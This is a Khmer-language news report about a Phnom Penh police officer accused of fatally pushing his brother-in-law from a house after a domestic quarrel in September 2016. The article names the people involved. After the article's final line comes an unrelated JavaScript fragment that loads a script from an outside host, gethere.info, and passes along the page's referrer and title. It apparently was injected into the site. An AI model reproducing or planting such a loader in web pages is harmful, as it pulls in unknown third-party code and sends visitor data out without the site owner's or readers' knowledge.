មន្ត្រីប៉ូលិសនៅក្រសួងមហាផ្ទៃវាយប្អូនថ្លៃទំលាក់ចុះពីលើផ្ទះបែកក្បាលស្លាប់
ភ្នំពេញ៖ បុរសដែលជាជនជាតិឥស្លាមម្នាក់ ត្រូវបានបងថ្លៃវាយទំលាក់ពីលើផ្ទះ បណ្តាលឲ្យបែកក្បាល និងដាច់សសៃឈាមស្លាប់ភ្លាមៗតែម្តង កាលពីវេលាម៉ោង ១០និង១០នាទីយប់ ថ្ងៃទី០៩ ខែកញ្ញា ឆ្នាំ២០១៦ ដែលស្ថិតនៅផ្ទះលេខ២៣ ក្រុម៣ ភូមិ១ ផ្លូវទន្លេសាប សង្កាត់ជ្រោយចង្វារ ខណ្ឌជ្រោយចង្វារ រាជធានីភ្នំពេញ។
ជនរងគ្រោះដែលស្លាប់នោះ មានឈ្មោះ លី វ៉ាន់ឌី ភេទប្រុស អាយុ ៥១ឆ្នាំ មុខរបរ រត់ម៉ូតូឌុប និងមានប្រពន្ធឈ្មោះ លី លីហ្សា អាយុ ៤២ឆ្នាំ មុខរបរ កម្មករសំណង់ ស្នាក់នៅផ្ទះកើតខាងលើ និងមានកូនស្រីចំនួន ០៣នាក់ ។ ចំណែកឯជនបង្កមានឈ្មោះ វេង សម្បត្តិ ភេទប្រុស អាយុ ៤៧ឆ្នាំ មុខរបរ ជាមន្ត្រីប៉ូលិសនៅក្រសួងមហាផ្ទៃ និងមានប្រពន្ធឈ្មោះ លី ស្រីម៉ៅ អាយុ ៥៣ឆ្នាំ មុខរបរ នៅផ្ទះ ស្នាក់នៅផ្ទះកើតហេតុខាងលើ និងមានកូនប្រុសស្រីចំនួន ០៣នាក់ ស្រី ០១ ប្រុស ០២។
ប្រភពព័ត៌មានពីប្រពន្ធជនរងគ្រោះបានប្រាប់ឲ្យដឹងថា នៅយប់ថ្ងៃកើតហេតុ រូបគាត់និងប្រពន្ធបានជម្លោះប្រកែតគ្នា ហើយប្តីរបស់ខ្លួនបានយកអំបោសបុសផ្ទះយកមកវៃក្បាលរបស់ខ្លួន ហើយខ្លួនក៏បានជេរចោលទៅលើរូបប្តីវិញយ៉ាងខ្លាំងៗ បង្កឲ្យលឺដល់បុរសជាបងថ្លៃដែលជាជនបង្ក ។ បន្ទាប់មក បុរសដែលជាបងថ្លៃនោះ បានស្រែកថា កុំជម្លោះគ្នាមាត់លឺៗពេក រំខាន់អាញ់ដេក ហើយបុរសដែលជាជនរងគ្រោះនោះ បានស្រែកតបទៅវិញថា អាចមន៍អី ភ្លាមៗនោះ ធ្វើអោយបុរសដែលជាបងថ្លៃមានការខឹងសប្បាយ៉ាងខ្លាំង បានស្ទុះចុះពីលើផ្ទះរបស់ខ្លួន ដើរឡើងទៅផ្ទះរបស់ជនរងគ្រោះ ហើយបានវាយមួយដៃ និងបានច្រានជនរងគ្រោះបណ្តាលឲ្យធ្លាក់ពីលើយ៉រផ្ទះដែលមានកំពស់ ២ម៉ែត្រ ៧តឹក ចុះមកក្រោមបណ្តាលឲ្យរងរបួសធ្ងន់ធ្ងរ ក្រោយពីកើតហេតុជនសង្ស័យដែលជាបងថ្លៃបានរត់គេចខ្លួនបាត់។
ប្រភពព័ត៌មានពីប្រជាពលរដ្ឋដែលរស់នៅកន្លែងកើតហេតុបានឲ្យដឹងថា ជារៀងរាល់ថ្ងៃ បុរសដែលជាជនដៃដល់នោះ បានវាយធ្វើបាបប្រពន្ធកូន និងរករឿងបុរសដែលជាប្អូនថ្លៃជាជនរងគ្រោះ ជារៀងរាល់ថ្ងៃនៅពេលដែលរូបគេចេញពីធ្វើការម្តងៗ។
លុះព្រឹកនៅវេលាម៉ោង ៩និង៣០នាទី ថ្ងៃទី០៩ ខែកញ្ញា ឆ្នាំ២០១៦ ជនរងគ្រោះបានដាច់ខ្យល់ស្លាប់ ហើយក្រុមគ្រួសារបានរាយការណ៍ទៅសមត្ថកិច្ច ព្រមទាំងបានដាក់ពាក្យប្តឹង ក្រោយពីដាក់ពាក្យប្តឹងរួចមក កម្លាំងសមត្ថកិច្ចជំនាញបានចុះមកដល់ផ្ទះកើតហេតុខាងលើ បានធ្វើកំណត់ហេតុ និងពិនិត្យមើលសាកសពរកឃើញថា ជនរងគ្រោះបានស្លាប់ដោយសារករណីខាងលើពិតប្រាកដមែន។ បន្ទាប់ពីសមត្ថកិច្ចបានធ្វើកោសល្យវិច័្ឆយរួចរាល់ហើយ សាកសពត្រូវបានសមត្ថកិច្ចប្រគល់អោយក្រុមគ្រួសារយកទៅធ្វើបុណ្យតាមប្រពៃណី។ ចំណែកឯជនដៃដល់ដែលត្រូវជាបងថ្លៃដែលកំពុងតែរត់គេចខ្លួននោះ ត្រូវបានកម្លាំងសមត្ថកិច្ចកំពុងតែធ្វើការស្រាវជ្រាវ តាមចាប់ខ្លួនយកមកផ្តន់ទាទោសតាមផ្លូវច្បាប់៕ ដោយ៖ ស៊ុនតិច
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;